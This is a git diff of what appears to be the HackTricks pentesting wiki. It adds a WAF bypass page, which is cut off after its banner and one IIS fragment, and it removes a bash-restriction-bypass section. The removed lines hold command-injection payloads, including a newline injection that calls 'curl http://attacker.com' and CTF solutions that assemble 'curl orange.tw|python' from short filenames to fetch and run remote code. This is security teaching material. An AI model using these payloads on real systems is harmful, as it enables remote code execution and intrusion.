diff --git a/SUMMARY.md b/SUMMARY.md
index 8f3921615..7a138c7c1 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -320,6 +320,7 @@
* [Tomcat](network-services-pentesting/pentesting-web/tomcat.md)
* [Uncovering CloudFlare](network-services-pentesting/pentesting-web/uncovering-cloudflare.md)
* [VMWare (ESX, VCenter...)](network-services-pentesting/pentesting-web/vmware-esx-vcenter....md)
+ * [WAF Bypass](network-services-pentesting/pentesting-web/waf-bypass.md)
* [Web API Pentesting](network-services-pentesting/pentesting-web/web-api-pentesting.md)
* [WebDav](network-services-pentesting/pentesting-web/put-method-webdav.md)
* [werkzeug](network-services-pentesting/pentesting-web/werkzeug.md)
diff --git a/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md b/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
index 6e569677d..ed13ed8cc 100644
--- a/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
+++ b/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
@@ -163,99 +163,6 @@ You could use **burpcollab** or [**pingb**](http://pingb.in) for example.
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
```
-### Bypass potential regexes
-
-```bash
-# A regex that only allow letters and numbers migth be vulnerable to new line characters
-1%0a`curl http://attacker.com`
-```
-
-### RCE with 5 chars
-
-```bash
-# From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge
-#Oragnge Tsai solution
-## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date
-http://host/?cmd=>ls\
-http://host/?cmd=ls>_
-http://host/?cmd=>\ \
-http://host/?cmd=>-t\
-http://host/?cmd=>\>g
-http://host/?cmd=ls>>_
-
-## Step2: generate `curl orange.tw|python` to file "g"
-## by creating the necesary filenames and writting that content to file "g" executing the previous generated file
-http://host/?cmd=>on
-http://host/?cmd=>th\
-http://host/?cmd=>py\
-http://host/?cmd=>\|\
-http://host/?cmd=>tw\
-http://host/?cmd=>e.\
-http://host/?cmd=>ng\
-http://host/?cmd=>ra\
-http://host/?cmd=>o\
-http://host/?cmd=>\ \
-http://host/?cmd=>rl\
-http://host/?cmd=>cu\
-http://host/?cmd=sh _
-# Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file
-
-## Finally execute the file "g"
-http://host/?cmd=sh g
-
-
-# Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
-# Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*"
-https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
-## Execute tar command over a folder
-http://52.199.204.34/?cmd=>tar
-http://52.199.204.34/?cmd=>zcf
-http://52.199.204.34/?cmd=>zzz
-http://52.199.204.34/?cmd=*%20/h*
-
-# Another curiosity if you can read files of the current folder
-ln /f*
-## If there is a file /flag.txt that will create a hard link
-## to it in the current folder
-```
-
-### RCE with 4 chars
-
-```bash
-# In a similar fashion to the previous bypass this one just need 4 chars to execute commands
-# it will follow the same principle of creating the command `ls -t>g` in a file
-# and then generate the full command in filenames
-# generate "g> ht- sl" to file "v"
-'>dir'
-'>sl'
-'>g\>'
-'>ht-'
-'*>v'
-
-# reverse file "v" to file "x", content "ls -th >g"
-'>rev'
-'*v>x'
-
-# generate "curl orange.tw|python;"
-'>\;\\'
-'>on\\'
-'>th\\'
-'>py\\'
-'>\|\\'
-'>tw\\'
-'>e.\\'
-'>ng\\'
-'>ra\\'
-'>o\\'
-'>\ \\'
-'>rl\\'
-'>cu\\'
-
-# got shell
-'sh x'
-'sh g'
-```
-
## Read-Only/Noexec Bypass
If you are inside a filesystem with the **read-only and noexec protections** there are still ways to **execute arbitrary binaries**. One of them is by the use of **DDexec**, yo can find an explanation of the technique in:
diff --git a/network-services-pentesting/pentesting-web/waf-bypass.md b/network-services-pentesting/pentesting-web/waf-bypass.md
new file mode 100644
index 000000000..778650b84
--- /dev/null
+++ b/network-services-pentesting/pentesting-web/waf-bypass.md
@@ -0,0 +1,62 @@
+# WAF Bypass
+
+
+
+Support HackTricks and get benefits!
+
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+
+Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+
+Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+
+**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+
+
+```bash
+# IIS, ASP Clasic
+<%s%cr%u0131pt> ==